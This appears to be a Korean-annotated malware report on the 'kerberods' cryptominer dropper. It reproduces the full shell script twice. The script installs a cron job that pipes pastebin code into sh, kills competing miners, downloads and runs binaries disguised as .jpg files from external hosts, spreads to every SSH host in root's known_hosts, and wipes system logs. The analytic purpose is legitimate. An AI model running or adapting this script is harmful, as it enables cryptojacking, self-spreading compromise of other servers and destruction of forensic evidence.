myso-kr/kerberods.report

## kerberods.report
### 해결사례 (변종이 아닌 경우 적용 가능한 것으로 파악 됨)
## https://laucyun.com/17e194c26e4554cab975aae760bad553.html
## https://git.laucyun.com/.../blob/master/clear_kerberods.sh

# 사용되는 코드
1: http://pastebin.com/raw/wR3ETdbi # 유동가능성 존재
2: https://pastebin.com/raw/Zk7Jv9j2
3: https://pastebin.com/raw/0Sxacvsh > GOTO 2
# tmp 생성 및 777 권한
mkdir -p /tmp
chmod 1777 /tmp
# cron 재등록
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh" | crontab -
# 프로세스 종료 구간
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
# writeable 강제 삭제
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
# 바이너리 다운로드 및 실행
# https://ko.wikipedia.org/wiki/ELF_%ED%8C%8C%EC%9D%BC_%ED%98%95%EC%8B%9D
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
　　chattr -i kerberods
　　rm -rf kerberods
　　ARCH=$(uname -m)
　　# 복호화툴로 의심되는 항목 (ELF 헤더)
　　# - http://1.z9ls.com/t6/701/1555396475x2918527158.jpg
　　# 각 아키텍쳐별 바이너리 (kerberods로 저장) ################## 핵심 부분
　　# x86_64x
　　# - https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg
　　# i686x
　　# - https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg
　　if [ ${ARCH}x = "x86_64x" ]; then
　　　　(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -O kerberods) && chmod +x kerberods
　　elif [ ${ARCH}x = "i686x" ]; then
　　　　(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
　　else
　　　　(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
　　fi
　　# 실행 가능한 모든 경로로 실행
　　$(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods
fi
# 알려진 ssh 키 기준으로 모든 터미널 원격 서버측으로 강제 명령 수행
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
　for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/0Sxacvsh||wget -q -O- https://pastebin.com/raw/0Sxacvsh)|sh >/dev/null 2>&1 &' & done
fi
# 로그 삭제 부분
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
	### 해결사례 (변종이 아닌 경우 적용 가능한 것으로 파악 됨)
	## https://laucyun.com/17e194c26e4554cab975aae760bad553.html
	## https://git.laucyun.com/.../blob/master/clear_kerberods.sh

	# 사용되는 코드
	1: http://pastebin.com/raw/wR3ETdbi # 유동가능성 존재
	2: https://pastebin.com/raw/Zk7Jv9j2
	3: https://pastebin.com/raw/0Sxacvsh > GOTO 2
	# tmp 생성 및 777 권한
	mkdir -p /tmp
	chmod 1777 /tmp
	# cron 재등록
	echo "/15 * * * (curl -fsSL https://pastebin.com/raw/0Sxacvsh\|\|wget -q -O- https://pastebin.com/raw/0Sxacvsh)\|sh" \| crontab -
	# 프로세스 종료 구간
	ps -ef\|grep -v grep\|grep hwlh3wlh44lh\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep Circle_MI\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep get.bi-chi.com\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep hashvault.pro\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep nanopool.org\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep /usr/bin/.sshd\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep /usr/bin/bsd-port\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "xmr"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "xig"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "ddgs"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "qW3xT"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "wnTKYg"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "t00ls.ru"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "sustes"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "thisxxs"\|awk '{print $2}' \| xargs kill -9
	ps -ef\|grep -v grep\|grep "hashfish"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "kworkerds"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "/tmp/devtool"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "systemctI"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "plfsbce"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "luyybce"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "6Tx3Wq"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "dblaunchs"\|awk '{print $2}'\|xargs kill -9
	ps -ef\|grep -v grep\|grep "/boot/vmlinuz"\|awk '{print $2}'\|xargs kill -9
	netstat -anp\|grep 119.9.106.27\|awk '{print $7}'\|sed -e "s/\/.*//g"\|xargs kill -9
	netstat -anp\|grep 104.130.210.206\|awk '{print $7}'\|sed -e "s/\/.*//g"\|xargs kill -9
	# writeable 강제 삭제
	cd /tmp
	touch /usr/local/bin/writeable && cd /usr/local/bin/
	touch /usr/libexec/writeable && cd /usr/libexec/
	touch /usr/bin/writeable && cd /usr/bin/
	rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
	# 바이너리 다운로드 및 실행
	# https://ko.wikipedia.org/wiki/ELF_%ED%8C%8C%EC%9D%BC_%ED%98%95%EC%8B%9D
	export PATH=$PATH:$(pwd)
	if [ ! -f "/tmp/.XIMunix" ] \|\| [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
	chattr -i kerberods
	rm -rf kerberods
	ARCH=$(uname -m)
	# 복호화툴로 의심되는 항목 (ELF 헤더)
	# - http://1.z9ls.com/t6/701/1555396475x2918527158.jpg
	# 각 아키텍쳐별 바이너리 (kerberods로 저장) ################## 핵심 부분
	# x86_64x
	# - https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg
	# i686x
	# - https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg
	if [ ${ARCH}x = "x86_64x" ]; then
	(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396475x2918527158.jpg -O kerberods\|\|curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../b39d9cbe6c63d7a621469bf13f3ea466.jpg -O kerberods) && chmod +x kerberods
	elif [ ${ARCH}x = "i686x" ]; then
	(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods\|\|curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
	else
	(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q http://1.z9ls.com/t6/701/1555396530x2918527158.jpg -O kerberods\|\|curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -o kerberods\|\|wget --timeout=30 --tries=3 -q https://i.ooxx.ooo/.../d8dfa3690186ca8ab80cb1028b01a770.jpg -O kerberods) && chmod +x kerberods
	fi
	# 실행 가능한 모든 경로로 실행
	$(pwd)/kerberods \|\| /usr/bin/kerberods \|\| /usr/libexec/kerberods \|\| /usr/local/bin/kerberods \|\| kerberods \|\| ./kerberods \|\| /tmp/kerberods
	fi
	# 알려진 ssh 키 기준으로 모든 터미널 원격 서버측으로 강제 명령 수행
	if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
	for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/0Sxacvsh\|\|wget -q -O- https://pastebin.com/raw/0Sxacvsh)\|sh >/dev/null 2>&1 &' & done
	fi
	# 로그 삭제 부분
	echo 0>/var/spool/mail/root
	echo 0>/var/log/wtmp
	echo 0>/var/log/secure
	echo 0>/var/log/cron